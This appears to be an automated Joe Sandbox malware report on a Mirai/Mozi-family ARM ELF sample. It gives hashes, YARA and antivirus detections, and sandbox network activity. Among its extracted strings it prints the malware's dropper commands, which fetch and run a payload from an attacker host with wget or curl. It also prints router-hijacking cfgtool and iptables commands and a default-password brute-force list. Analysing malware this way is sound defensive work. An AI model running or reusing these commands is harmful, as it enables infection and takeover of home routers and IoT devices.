Edit tour

Linux Analysis Report
i.elf

Overview

General Information

Sample name:i.elf
Analysis ID:1649978
MD5:93e334e8fabc576799f12af1aba19e43
SHA1:2ae559c2e550f4a7746765608383ffdd34054665
SHA256:10fa6b6e524f39fdfb00803df138d657d5070c88f4fa788fcceb0d0d0de53651
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1649978
Start date and time:2025-03-27 10:53:19 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@2/0
Command:/tmp/i.elf
PID:5439
Exit Code:135
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • i.elf (PID: 5439, Parent: 5361, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/i.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    i.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
      i.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        i.elfLinux_Trojan_Mirai_5c62e6b2unknownunknown
        • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
        i.elfLinux_Trojan_Mirai_77137320unknownunknown
        • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
          5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
            5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmpLinux_Trojan_Mirai_5c62e6b2unknownunknown
              • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
              5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmpLinux_Trojan_Mirai_77137320unknownunknown
              • 0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
              Click to see the 2 entries
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: i.elfAvira: detected
              Source: i.elfVirustotal: Detection: 62%Perma Link
              Source: i.elfReversingLabs: Detection: 58%
              Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: i.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
              Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m
              Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;
              Source: i.elfString found in binary or memory: http://%s:%d/bin.sh
              Source: i.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: i.elfString found in binary or memory: http://127.0.0.1
              Source: i.elfString found in binary or memory: http://127.0.0.1sendcmd
              Source: i.elfString found in binary or memory: http://HTTP/1.1
              Source: i.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: i.elfString found in binary or memory: http://ipinfo.io/ip
              Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

              System Summary

              barindex
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
              Source: Initial sampleString containing 'busybox' found: busybox
              Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing potential weak password found: admin
              Source: Initial sampleString containing potential weak password found: default
              Source: Initial sampleString containing potential weak password found: support
              Source: Initial sampleString containing potential weak password found: service
              Source: Initial sampleString containing potential weak password found: supervisor
              Source: Initial sampleString containing potential weak password found: guest
              Source: Initial sampleString containing potential weak password found: administrator
              Source: Initial sampleString containing potential weak password found: 123456
              Source: Initial sampleString containing potential weak password found: 54321
              Source: Initial sampleString containing potential weak password found: password
              Source: Initial sampleString containing potential weak password found: 12345
              Source: Initial sampleString containing potential weak password found: admin1234
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
              Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
              Source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
              Source: classification engineClassification label: mal88.troj.linELF@0/0@2/0
              Source: /tmp/i.elf (PID: 5439)Queries kernel information via 'uname': Jump to behavior
              Source: i.elf, 5439.1.00007ffee5d4f000.00007ffee5d70000.rw-.sdmpBinary or memory string: \x86_64/usr/bin/qemu-arm/tmp/i.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/i.elf
              Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmpBinary or memory string: F<Vrg.qemu.gdb.arm.sys.regs">
              Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: i.elf, 5439.1.00007ffee5d4f000.00007ffee5d70000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
              Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmpBinary or memory string: F<V!/etc/qemu-binfmt/arm
              Source: i.elf, 5439.1.0000563c46bec000.0000563c46cf8000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: i.elf, type: SAMPLE
              Source: Yara matchFile source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: i.elf PID: 5439, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: i.elf, type: SAMPLE
              Source: Yara matchFile source: 5439.1.00007fcae4017000.00007fcae4058000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: i.elf PID: 5439, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              1
              Scripting
              Path InterceptionDirect Volume Access1
              Brute Force
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Non-Application Layer Protocol
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649978 Sample: i.elf Startdate: 27/03/2025 Architecture: LINUX Score: 88 8 daisy.ubuntu.com 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 Yara detected Mirai 2->16 6 i.elf 2->6         started        signatures3 process4
              SourceDetectionScannerLabelLink
              i.elf63%VirustotalBrowse
              i.elf58%ReversingLabsLinux.Backdoor.Mirai
              i.elf100%AviraEXP/ELF.Mirai.O
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              daisy.ubuntu.com
              162.213.35.25
              truefalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://%s:%d/bin.sh;chmodi.elffalse
                  high
                  http://HTTP/1.1i.elffalse
                    high
                    http://ipinfo.io/ipi.elffalse
                      high
                      http://127.0.0.1i.elffalse
                        high
                        http://baidu.com/%s/%s/%d/%s/%s/%s/%s)i.elffalse
                          high
                          http://schemas.xmlsoap.org/soap/encoding/i.elffalse
                            high
                            http://schemas.xmlsoap.org/soap/envelope//i.elffalse
                              high
                              http://%s:%d/bin.shi.elffalse
                                high
                                http://%s:%d/Mozi.mi.elffalse
                                  high
                                  http://127.0.0.1sendcmdi.elffalse
                                    high
                                    http://%s:%d/Mozi.m;i.elffalse
                                      high
                                      http://schemas.xmlsoap.org/soap/envelope/i.elffalse
                                        high
                                        No contacted IP infos
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        daisy.ubuntu.comi.elfGet hashmaliciousMiraiBrowse
                                        • 162.213.35.25
                                        morte.spc.elfGet hashmaliciousUnknownBrowse
                                        • 162.213.35.25
                                        efjepc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 162.213.35.25
                                        morte.arm6.elfGet hashmaliciousUnknownBrowse
                                        • 162.213.35.25
                                        spc.elfGet hashmaliciousOkiruBrowse
                                        • 162.213.35.24
                                        resgod.ppc.elfGet hashmaliciousMiraiBrowse
                                        • 162.213.35.24
                                        x64.elfGet hashmaliciousGafgyt, OkiruBrowse
                                        • 162.213.35.24
                                        resgod.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 162.213.35.25
                                        resgod.m68k.elfGet hashmaliciousMiraiBrowse
                                        • 162.213.35.24
                                        resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                        • 162.213.35.25
                                        No context
                                        No context
                                        No context
                                        No created / dropped files found
                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                        Entropy (8bit):6.121203743939349
                                        TrID:
                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                        File name:i.elf
                                        File size:272'748 bytes
                                        MD5:93e334e8fabc576799f12af1aba19e43
                                        SHA1:2ae559c2e550f4a7746765608383ffdd34054665
                                        SHA256:10fa6b6e524f39fdfb00803df138d657d5070c88f4fa788fcceb0d0d0de53651
                                        SHA512:4f25cf9627a31a18bdeebc6e371cf8fc4660cd7d73f14f190ad9752c55559fc13e2637f08dc45a457b1504f6c8d49eee35f20bc8ced062df1d821a0c745e7ae2
                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                        TLSH:6644398AFD81AF25D5C5227BFE2F428A33131BB8D2EB71129D145F24768A94F0F3A541
                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                        Download Network PCAP: filteredfull

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 27, 2025 10:54:12.094376087 CET3925853192.168.2.131.1.1.1
                                        Mar 27, 2025 10:54:12.094470024 CET5495953192.168.2.131.1.1.1
                                        Mar 27, 2025 10:54:12.179481030 CET53549591.1.1.1192.168.2.13
                                        Mar 27, 2025 10:54:12.179543018 CET53392581.1.1.1192.168.2.13
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 27, 2025 10:54:12.094376087 CET192.168.2.131.1.1.10x84abStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                        Mar 27, 2025 10:54:12.094470024 CET192.168.2.131.1.1.10x7498Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 27, 2025 10:54:12.179543018 CET1.1.1.1192.168.2.130x84abNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                        Mar 27, 2025 10:54:12.179543018 CET1.1.1.1192.168.2.130x84abNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                        System Behavior

                                        Start time (UTC):09:54:09
                                        Start date (UTC):27/03/2025
                                        Path:/tmp/i.elf
                                        Arguments:/tmp/i.elf
                                        File size:4956856 bytes
                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1